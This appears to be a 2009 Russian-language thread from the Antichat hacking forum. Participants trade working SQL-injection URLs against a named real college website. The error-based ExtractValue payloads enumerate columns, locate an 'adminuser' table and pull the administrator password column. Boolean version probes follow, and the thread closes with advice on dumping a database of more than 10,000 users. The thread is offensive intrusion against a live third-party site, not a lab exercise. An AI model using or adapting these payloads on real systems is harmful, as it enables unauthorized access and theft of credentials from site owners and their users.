 |
|
11.12.2009, 19:35
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Pashkela
насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому.
Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно.
Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи
Последний раз редактировалось jokester; 11.12.2009 в 19:39..
|
|
|
11.12.2009, 19:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 jokester:
Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше.
Блинда все-таки, а не очередной unhex(hex())
Последний раз редактировалось Pashkela; 11.12.2009 в 19:48..
|
|
|
|
11.12.2009, 19:55
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Pashkela
Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте.
...
Блинда все-таки, а не очередной unhex(hex())
Это не блайнд в том-то всё и дело, а не предложил...
Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят.
Ок. Предложение:
1
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_nam e,column_name)) from information_schema.columns+where+column_name+LIKE+ CHAR(37,112,97,115,37) limit 1)))--+
2
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(co lumn_name)+from+information_schema.columns+where+t able_name='adminuser'+limit+1)))--+
Внимание интрига! Составьте третий запрос сами!!!
|
|
|
|
11.12.2009, 20:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект  Нет бы сразу
Третий запрос наверное такой, извините мне мою наглость:
Код:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select%20USR_Password%20from%20trccweb.adminuser%20limit%200,1)))--+
PS: Аплодирую стоя
Последний раз редактировалось Pashkela; 11.12.2009 в 20:09..
|
|
|
|
11.12.2009, 20:12
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+
гениально
пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
|
|
|
|
11.12.2009, 20:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
ну и чем твой запрос отличается от моего в принципе? Перестановкой and or 1=1? Смешно
PS: А, понял, типо в твоем БОЛЕЕ очевидно, что 5-я ветка. Ну мейби, мейби, типо меньше глаза ломать. Но у меня зато не надо думать о кавычках и последовательности их закрытия, т.к. просто вызываем ошибку и дальше все стандартно (тут все-таки не диссер пишем, а наводим чела на хотя бы правильное решение. Ты еще шелл предложи ему залить просто так ) Вот джок молодец, я такого раньше и не слыхал.
Последний раз редактировалось Pashkela; 11.12.2009 в 20:28..
|
|
|
|
11.12.2009, 20:37
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Pashkela, ну да, статьи то читать это же только для крутых цветных дядек
|
|
|
|
11.12.2009, 20:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Да-да, вы все правы несомненно. Пойду читать. Ибо, как я понял, просто помочь уже не катит, надо подсказать максимально эффективно. Но радует такая придирчивость, честно. Так правдами и неправдами действительно хоть чему-то научиться можно.
PS: Только в бошку оно быстрее и надежнее влезает на живых примерах-то.
Последний раз редактировалось Pashkela; 11.12.2009 в 21:53..
|
|
|
|
12.12.2009, 17:28
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
|
|
|
|
12.12.2009, 18:41
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от jecka3000
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
Доступ к шеллу есть? Если mysql бд, то mysql-dump
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1749796){kind=avatar}
Похожие темы
Линейный вид
